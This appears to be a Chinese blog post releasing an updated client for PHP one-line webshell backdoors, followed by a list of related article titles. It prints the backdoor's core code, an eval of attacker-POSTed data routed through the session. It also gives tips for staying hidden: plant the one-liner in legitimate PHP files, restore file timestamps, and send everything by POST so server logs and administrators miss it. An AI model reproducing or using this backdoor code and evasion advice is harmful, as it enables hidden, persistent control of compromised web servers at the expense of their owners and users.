V0.2

2009-11-11(正好是光棍节,晕~)更新内容:

—————————–

1.修补了下原始版本有些服务器不能正常运行的大Bug。

2.去掉了提交后的登陆密码验证,提交后直接进入大马界面。

—————————–

更新说明:

—————————–

这玩意本来就是为了方便自己做的,所以本来只打算对自己负责,呵呵。好马好工具如果传出来必然被传烂掉,但这东西无所谓,又不是多特别的东西,但有时候用着比较方便,所以发出来也无妨。

但是发出来后有朋友告诉我有些服务器上运行没成功,心里顿觉愧疚,发个小东西出来,结果功能还有问题,岂不是欺骗大众。但是一直在忙,除了当时做的 时候之外,几乎再没去测试过。昨晚hiphop兄给我说他那有台服务器用不起,本来打算让他发Shell来我正好测试下具体原因,结果他说他已经测试了并 告诉是magic_quotes_gpc的原因(是个低级错误…),得谢谢他。

然后花了个把小时详细测试并修改了下

相关关键代码:

session_start();$_SESSION[chr(99)]=get_magic_quotes_gpc()?stripslashes($_POST[chr(100)]):$_POST[chr(100)];eval($_SESSION[chr(99)]);

—————————–

现在的版本magic_quotes_gpc On和Off都测试OK,不过不知道还有没有其它会造成不正常的因素,实在懒的自己去一个一个测试了,等遇到了再说吧,也欢迎大家反馈。

—————————–

——————–

前天通宵到后半夜的时候,总觉得自己最近都没干什么实事,觉得有点虚度的味道,心中不免有些自责。为了宽慰自己,决定做点正事。然后就啥都没干,坐着干想该做什么。一直想到快天亮,总算想出点东西来了(- -!),也就是现在发布的这个东西。

海洋顶端有个一键提交版的ASP一句话客户端,很方便,一次提交之后,一句话就可以当大马用了。用这种客户端的话,留一句话的shell也就麻烦不到哪去了,而且把一句话藏在正常文件里面,再把时间改回正常,访问只用POST的话,基本是很难发现的。

但是PHP一句话一直没有见这样的客户端(不知道是不是我孤弱寡闻),网上居然还有转载的到处都是的工具,结果下载下来不能用…..

比较喜欢一句话的一键提交这种形式,所以花了2 x 半个通宵的时间做了这个东西,思路参考的是海洋,客户端的CSS也是修改它的,呵呵。

注意:

由于一键提交版的特殊性,暂时是不能随心所欲的换密码的,这个客户端的密码是字母c。(海洋的也是这样)。这个问题并不是不能解决,但是比较麻烦,所以还不如就用这密码呢,呵呵。

特点:

1.填好一句话WebShell地址和密码并点提交之后,后续操作不用再依赖客户端,基本上剩下的和操作大马没什么两样。

2.完全POST提交,避免了WebServer记录敏感数据。如果一句话插在有正常用户访问的PHP文件的话,插完时间也改回来了,那么管理员发现的概率就相当低了。(海洋的不是全POST)

大概原理:

一键提交版的一句话客户端连接成功之后,每次POST数据的时候, 假设一句话密码是c,都要先让本地表单:

c = session_start();eval($_SESSION[chr(120)]);

chr(120)就是字母c,为了避免单引号写成chr(120)形式。

然后一句话在eval($_POST[c])的时候,才能执行保存在Session中的我们的PHP代码。

想用其它密码的朋友可以依据这个原理修改。

php一句话木马下载,零魂PHP一句话木马客户端(一键提交版)相关推荐

  1. 超级BT木马下载器 Gameservet.exe的分析 game1.exe 8888-521ww.exe qjso.exe

    今天接到了一个叫Gameservet.exe的样本 测试了一下 测试结果真的让人震惊 这是个超级变态的木马下载器 当今流行的木马几乎都全了 而且最后还捣登出来个威金来 哎 现在的病毒都太厉害 那些无耻 ...

  2. PHP一句话代码下载壁纸

    PHP一句话代码下载壁纸 PHP一句话代码下载壁纸 代码段: //拷贝远程文件需要开启PHP配置文件中的allow_url_fopen=On for($i=0;$i<20;$i++){var_d ...

  3. php一句话图片木马怎么运行,php型一句话木马怎么写

    php型一句话木马怎么写? PHP一句话木马 一: 关于PHP的一句话木马:<?php $a=$_POST['H']; eval("$a");//eval会将输入的$a作为p ...

  4. 记一次Emotet木马下载器的分析

    Part 1: 简要流程: 1. Sub Document_open()执行代码调用O15ho2roxnv7ybuidx.H4b0154n64u 2.1 H4b0154n64u调用 Fl5n0bbcb ...

  5. “猫癣”木马下载器成为春节期间最大毒瘤

    "猫癣"木马下载器成为春节期间最大毒瘤 据反病毒安全专家统计的数据显示,在刚刚结束的春节长假期间一些病毒大肆利用长假狠捞一笔.其中,猫癣下载器(Win32.Troj.Dropper ...

  6. 木马下载器盗号数十种 破天木马剑指网游

    "木马下载器20480"(Win32.TrojDownloader.wmTable.a.20480),这是一个下载者病毒.此病毒文件为muma.exe的可执行文件,但并不局限于该名 ...

  7. 木马下载器连环出击盗号 “完美时空”帐下《完美世界》《武林外传》《完美世界II》《诛仙》无一幸免(1108)

    木马下载器连环出击盗号  "完美时空"帐下<完美世界><武林外传><完美世界II><诛仙>无一幸免(1108) 备选: 黑客木马猖獗 ...

  8. 天龙固件U盘更新_硅格T18D量产工具下载_硅格T18D量产工具官方版下载[u盘格式化]...

          硅格T18D量产工具官方版是比较实用的u盘修复工具,硅格T18D量产工具官方版可以让使用者很轻松便捷的对硅格T18D进行量产操作,并支持修复和格式化的功能,提高U盘的性能,释放空间.硅格T ...

  9. grasshop 犀牛5.0下载_神契幻奇谭 v1.129版发布 快来下载神契幻奇谭2020最新官方版...

    全文导读 下载神契幻奇谭就上高手游,神契幻奇谭是一款具有二次元.烧脑特征的角色扮演手机游戏,最让人难忘的是精致生动的形象设计系统和宏大的剧情,平平淡淡还是揭竿而起,传奇史诗由您亲自谱写!神契幻奇谭日前 ...

最新文章

  1. c# 第9节 数据类型之引用类型
  2. 如何选择最优路径完成云原生上云?听这场阿里云特别分享【云原生技术与最佳实践】
  3. ​亚马逊出品:非均匀扰动的对抗鲁棒性理论分析
  4. [转]asp.net(c#)生成验证码 点击可刷新
  5. python对excel操作简书_Python读写Excel表格,就是这么简单粗暴又好用
  6. Ubuntu14.04安装build-essential失败,包依赖问题如何解决?
  7. 连接主机Java网络编程(一)- 一个简单的服务端/客户端应用程序
  8. vim个性化设置---给脚本文件加注释头信息
  9. sql常用语句集合(工作总结)
  10. “iPad 上不可错过的应用有哪些?”
  11. http://www.cnblogs.com/dolphin0520/p/3923167.html
  12. 智能健身动作识别:PP-TinyPose打造AI虚拟健身教练!
  13. 【算法讲10:自适应辛普森法】求平滑曲线积分近似 | 洛谷 P4526 | HDU1724 | QLU Youmu with Master spark
  14. centos7:在linux世界里,一切皆文件
  15. IT公司、软件公司资质(转)
  16. 现实总比相像中好些——西单图书大厦活动侧记
  17. 学到长痘之 - Spring Boot
  18. 详解信贷三级逾期口径,你可能并没有真正看懂逾期
  19. linux光盘位置,红旗LINUX的安装文件在光盘的什么位置?
  20. 用户体验设计—影响定制化设计的因素

热门文章

  1. android点击软键盘外面的区域关闭软键盘解决办法
  2. 信号采样中,频率分辨率的定义
  3. 利用Postgresql+Postgis进行空间地理信息分析(道路偏移,进出电子围栏等)
  4. Django-page 分页
  5. jmeter常用随机函数
  6. 有什么办法可以消除眼袋吗?
  7. LabVIEW调用DLL时出现异常0xc0000005代码
  8. IDEA换背景壁纸及其插件background image plus +
  9. MySQL数据库的四种连接方式
  10. 全网最全的爆款抓包工具的综合对比